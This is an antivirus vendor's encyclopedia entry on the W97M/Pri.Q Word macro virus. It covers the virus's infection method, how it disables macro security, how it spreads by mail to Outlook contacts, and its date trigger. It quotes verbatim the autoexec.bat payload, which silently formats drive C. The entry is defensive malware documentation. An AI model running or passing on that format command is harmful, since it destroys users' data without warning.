Threat Encyclopedia

Selected viruses, spyware, and other threats: sorted alphabetically

W97M/Pri.Q

W97M/Pri.Q is a polymorphic macro virus operating in the Microsoft Word 97 environment. It uses the "class" method of infection – it attacks the module "ThisDocument" which is present as a standard in each Word document or template. It attacks the global template normal.dot and Word documents. It is derived from the virus W97M/Pri.A and a part of its code comes from the virus W97M/Melissa.A. It is able of spreading also by means of files in an attachment of e-mail messages.
After opening an infected document W97M/Pri.Q turns off the Word anti-virus protection and disables displaying of warning on storing the global template and on macros conversion. It also disables adding of documents into the list of the last opened documents. It sets the lowest possible level of Word protection and disables the item Tools/Macro/Security... in the Word menu. It infects the global template and then attacks documents as they are opened and closed.
In addition, the virus is able of spreading by means of files in an attachment of e-mail messages. The virus sends its copy to the first 50 addresses from the Microsoft Outlook contacts address book. Subject of such a message is formed by the text Message From the Word user’s name, where instead of the string Word user’s name name of the user to who the program Word is registered is written. The message body is formed by the text "This document is very Important and you've GOT to read this !!!". The name of the file in the attachment is identical with the name of the infected document.
The virus marks sending out of its copies by means of e-mail by creating a key in the system registry. In HKEY_CURRENT_USER\Software\Microsoft\Office\ it creates the item CyberNET with value (C)1999 - Indonesia by AnomOke!.
The virus activating routine is manifested on December 25th. The file autoexec.bat is overwritten by the following code:

@echo off
@echo Vine...Vide...Vice...Moslem Power Never End...
@echo Your Computer Have Just Been Terminated By -= CyberNET =- Virus !!!
ctty nul
format c: /autotest /q /u

This code causes that disk C: is formatted after the system restart. After overwriting the file autoexec.bat the virus displays the following window with text:

In the end the virus inserts up to 70 random geometrical shapes in random colours into the active document.

© 1992-2004 Eset s.r.o. All rights reserved. No part of this Encyclopedia may be reproduced, transmitted or used in any other way in any form or by any means without the prior permission.